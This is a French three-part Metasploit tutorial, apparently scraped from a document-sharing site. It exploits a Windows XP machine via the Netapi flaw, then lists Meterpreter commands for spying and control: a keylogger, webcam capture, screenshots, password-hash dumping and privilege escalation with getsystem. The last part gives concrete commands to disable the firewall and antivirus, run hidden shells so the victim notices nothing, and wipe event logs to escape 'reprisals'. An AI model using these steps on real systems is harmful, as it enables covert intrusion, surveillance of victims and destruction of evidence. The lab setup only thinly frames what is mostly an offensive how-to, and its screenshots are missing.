Sunteți pe pagina 1din 8

Metasploit : Partie 1 Windows XP Netapi

Materiel Requis :

Un Linux ou un Backtrack du moment que vous pouvez lancer Metasploit.


Un Windows XP SP3 qui sera notre victime, sur cette machine nous allons couper le pare-
feu, histoire de pas trop se compliquer la vie.

Autrement dit 2 Machines virtuelles. Lessentiel tant donc davoir ces deux ordinateurs sur le
mme rseau.
Ce qui nous donne a peu prs ceci :

Merci Cisco Paquet Tracer !

Prparer Metasploit :

on commence donc par lancer msfconsole :

On choisis ensuite lexploit que lon va utiliser, cest a dire la faille que nous utilisons.
Pour celle ci nous utiliserons la faille Netapi.
Pour cela on utlise la commande use suivit de lexploit dsir :

Puis on regarde les informations demands par lexploit avec la commande Show options :
On selectionne ensuite notre Payload, cest a dire le code que lon va executer chez la victime.

Lexploit est donc la faille et le payload le code qui va etre inject.

On verifie encore une fois les options, car chaque Payload a les siennes:

Il faut donc fournir :


RHOST : Lip de la victime.
LHOST : Lip de lattaquant.

Exploit Time !

Maintenant que tout est pret il est temps de lancer LExploit !


Et voila ! Si vous arrivez sur cette image vous avez russi !
Vous avez accs au Meterpreter, vous etes sur la machine cible !

Metasploit : Partie 2 Meterpreter


Maintenant que nous avons russi a obtenir une connexion sur notre machine cible nous allons voir
ce que lon peux faire avec le meterpreter.

Commandes de bases.

Se dplacer dans les dossiers: cd, ls


Connaitre son emplacement : getlwd (Machine de lattaquant) getwd (Machine victime)

Supprimer des fichiers/dossiers : fichiers => rm <fichier> dossier => rmdir <dossier>
Trouver un fichier sur lordinateur : find -f <fichier>
Crer un dossier : mkdir <nomdudossier>
Envoyer des fichiers a la cible : upload <nomdufichier>
Lire un fichier : cat <fichier>
Editer un fichier : edit <fichier>
Tlcharger un fichier : download <fichier>

Commandes Rseau.

Lister les interfaces rseaux : ifconfig/ipconfig


Rediriger un port : portfwd <port> <options>
Connaitre les routes : route

Commandes Systme.

Obtenir des infos sur la machine : sysinfo


Obtenir un shell : shell
Connaitre le Process ID : getpid
Connaitre la liste des processus: ps
Arrter un processus : kill <PID>
Connaitre luser ID : getuid
Connaitre la liste des privilges de lutilisateur : getprivs
Vider les fichiers de logs: clearv
Toucher au registre de la cible : reg <options>
lever ses privilges : getprivs
teindre lordinateur : shutdown
Redmarrer lordinateur : reboot

Commandes Espion.

Lister les webcams : webcam_list


Prendre une photo avec la webcam : webcam_snap <Webcam>
Connaitre les bureaux accessibles : enumdesktops
Connaitre lemplacement du meterpreter sur la machine : getdesktop
Greffer le meterpreter sur un bureau : setdesktop <nom>
Prendre un screenshot de lecran : screenshoot
Connaitre les accs a un fichier : timestomp <options> <fichier>
Keylogger :
On commence par lister les processus avec ps.
On se greffe ensuite sur le processus en question : migrate <pid>
On dmare ensuite le keylogger : keyscan_start
Pour afficher ensuite ce qui est tap par la victime on fait : keyscan_dump
Ce qui nous affiche ce qui a t tap depuis que lon scanne le dbut du scan.
Pour arrter on tape : keyscan_stop
Voir les contenus du fichier SAM
Rien de trs compliqu pour cette dernire commande.
Celle ci nous donnera la liste des hash que vous pourrez ensuite craquer avec Cain ou John.
Pour obtenir cette liste on tape juste : hashdump.

Metasploit : Partie 3 Root & Sleath !

Maintenant que nous avons russi prendre le contrle dune machine et que nous avons vu un peu
comment fonctionnait le meterpreter, nous allons voir comment lever nos privilges sur la
machine cible. Cependant il ne serait pas trs malin de se faire reprer aussi tt nos petits actes
accomplit, nous allons donc aussi voir quelles sont les solutions de Metasploit pour nous aider a
nous protger dventuelles reprsailles.

Elever ses privilges :

Tout dabord on peut commencer par taper sysinfo qui va nous donner des informations basiques
sur lordinateur, comme son nom, son OS, son architecture..
On peux aussi en profiter pour recolter un maximum dinformation sur la victime.
scraper et winenum sont deux scripts qui permettent de recolter un beau paquet dinfos ( a lancer
avec la commande run ! )
Et ensuite on va recuperer ca dans /.msf4/logs/scripts/<scriptlanc>/<cible_date>

Rsultat de la commande run scraper


Toutes ces informations sont stockes chez vous, vous pourrez donc les exploiter sans tre sur le
rseau de la cible !
Je vous presente ici deux scripts, mais tapez la commande run suivit de <tab> et regardez un peu le
nombre de scripts prsents
Certains de ces scripts se lancent par une simple commande comme vu prcdemment.

Parmi les commandes qui nous intressent aujourdhui : getuid


Celle ci vous montre qui vous tes sur la machine.
En sachant que le gros lot sera : AUTORITE NTSYSTEM
En dautres termes : root.
Chose trs importante, chaque processus appartient a un utilisateurs. Ainsi donc lorsque vous vous
greffez a un processus ( pour raliser par exemple un keylogger) vous obtenez lidentit de
lutilisateur qui a lanc cette application.
Si toute fois vous nobtenez pas directement un accs root a la machine cible, Metasploit a la
solution !
En utilisant la commande : getsystem
Celle ci utilise 4 types dattaques qui permettent daugmenter vos privilges sur la machine cible et
ainsi de jouir des droits root !
Vous pouvez prciser lattaque qui vous intresse ou laisser par dfaut, il les tenteras alors dans
lordre.
Les 4 attaques de getsystem

Bye Bye Anti Virus & Firewall !


Maintenant que nous avons le plein accs a la machine il serait bon de dsactiver lantivirus et le
pare feu histoire de ritrer notre exploit plus souvent.
Pour se faire on commence par se donner un accs a un terminal :
execute -f cmd.exe -c -H
-c nous permet de mettre ce procces de cot dans le meterpreter et de le rappeler par la suite
avec interact.
-H permet de ne pas jeter une popup aux yeux de la victime ..

interact 1

Ce qui nous donne accs au terminal que nous venons de crer.


On commence par checker letat du firewall :
netsh firewall show opmode
Puis on le coupe :
netsh firewall set opmode mode= DISABLE
Lantivirus nest ni plus ni moins quun service/programme, donc un processus qui tourne.
Commenons par regarder les processus en cours :
tasklist
( /? pour les options )
Ce qui vous donnera une liste des processus en cours.
Une fois lanti virus identifi il ne vous reste plus qua remonter au processus parent,. Pour
lexemple je vais arreter notepad.exe.
taskkill /F /IM note*

/F => Force
/IM => Nom du processus
Cependant il se peut aussi que lantivirus dispose dun systeme empechant son arret total ..

Alors pour savoir ce que lon peut faire avec lui on utilise sc ce petit programme nous permet de
communiquer avec NT Service Controler et ainsi dobtenir des renseignements assez pouss sur un
processus a laide de loption queryex par exemple ici avec le service WebClient :

Ici on peut voir que ce service peut tre stopp, accepte dtre teint, mais pas mis en pause.
Si toute fois il ne voulais pas tre stopp on pourrais au moins lempcher de dmarrer :
sc config <nom du service> start= disable

Le service ne dmarrera plus, ceci est particulirement utile si celui ci lance sans cesse lantivirus.
Imaginez vous coupez lantivirus et le service le relance .. Avec cette commande cela narrivera
plus.
Invisible Man !
Maintenant que nous avons accs la machine, que nous sommes root, et que nous pouvons faire
un peut tout ce que lon veut il serait vraiment dommage de se faire attraper une fois nos actions
accomplies ..
Bien sur Metasploit propose des modules pour cela ! Attention, cest partit :

Pleins de logs.

Clearev.

Plus de logs.

Pas vraiment besoin de sattarder la dessus, la commande clearev nous permet de vider les fichiers
de logs.

Voila, cest tout pour cette partie la.


Rsumons, nous savons maintenant comment devenir root, comment couper le pare feu, se
dbarrasser de lantivirus ou dun programme gnant, et ce sans que lutilisateur puisse le voir.

S-ar putea să vă placă și